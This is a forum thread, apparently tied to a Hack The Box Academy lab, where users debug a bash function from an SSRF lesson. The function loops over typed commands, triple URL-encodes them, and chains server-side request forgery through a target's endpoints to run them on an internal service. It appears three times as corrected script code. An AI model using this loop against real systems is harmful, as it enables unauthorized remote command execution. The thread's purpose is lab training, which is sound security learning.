SSRF Exploitation Example - Bash Fuct

JPwnage · January 1, 2023, 5:57am

In the ssrf exploitation example section at the end of the section htb academy give you a bash function to use in order to gain rce via ssrf. The issue i’m having is when i try to use the function, i get nothing but syntax errors and i do not know enough to sort out why and when i looked up function writing via bash terminal, nothing stood out. So i’m asking you pros for help

──(root㉿kali)-[~]
└─# function rce() {
function> while true; do
function while> echo -n "# "; read cmd
function while> ecmd=$(echo -n $cmd | jq -sRr @uri | jq -sRr @uri | jq -sRr @uri)
function while> curl -s -o - "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=${ecmd}"
function while> echo ""
function while> done
function> }
bash: syntax error near unexpected token `>'
bash: syntax error near unexpected token `>'
bash: syntax error near unexpected token `>'
bash: syntax error near unexpected token `>'
bash: syntax error near unexpected token `>'
bash: syntax error near unexpected token `>'
bash: syntax error near unexpected token `>'

and when i try to write it out without creating new lines, I still get syntax errors.

┌──(root㉿kali)-[~]
└─# function rce() { function> while true; do function while> echo -n "# "; read cmd function while> ecmd=$(echo -n $cmd | jq -sRr @uri | jq -sRr @uri | jq -sRr @uri) function while> curl -s -o - "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=${ecmd}" function while> echo "" function while> done function> }
bash: syntax error near unexpected token `>'

any help would be great, thanks!

onthesauce · January 1, 2023, 1:27pm

Hey, I have fielded a few questions about this bash function, so I will leave this here. I would recommend just throwing it into a script instead:

#!/bin/bash

function rce() {
    while true; do
        echo -n "# "; read cmd
        ecmd=$(echo -n $cmd | jq -sRr @uri | jq -sRr @uri | jq -sRr @uri)
        curl -s -o - "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=${ecmd}"
        echo ""
        done
}
rce

I have always found that I make mistakes while trying to type it into the cli like the example shows. Hope this helps.
-onthesauce

JPwnage · January 2, 2023, 3:52am

Thanks man, I actually thought about putting into a script but i wasn’t sure if it could be used the same way or if i would have to do something different to get it working. Although i’ve been using Linux for a long time, i’ve only written basic scripts that are pretty much just a bunch of single line commands put into a text file. So functions in bash is new to me and is something i’m going to have to work on, Thanks again bro! Happy new year!

JPwnage · January 2, 2023, 4:15am

Another way I thought about after creating this post and actually just tried out is by using ChatGPT. And no surprise it works flawlessly, Its also the same as whats in your script.
So for anyone who doesm’t want to create a bash script, just use this or chatgpt to fix the example.


function rce() {
    while true; do
        echo -n "# "; read cmd
        ecmd=$(echo -n "$cmd" | jq -sRr @uri | jq -sRr @uri | jq -sRr @uri)
        curl -s -o - "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http:////127.0.0.1:5000/runme?x=${ecmd}"
        echo ""
    done
}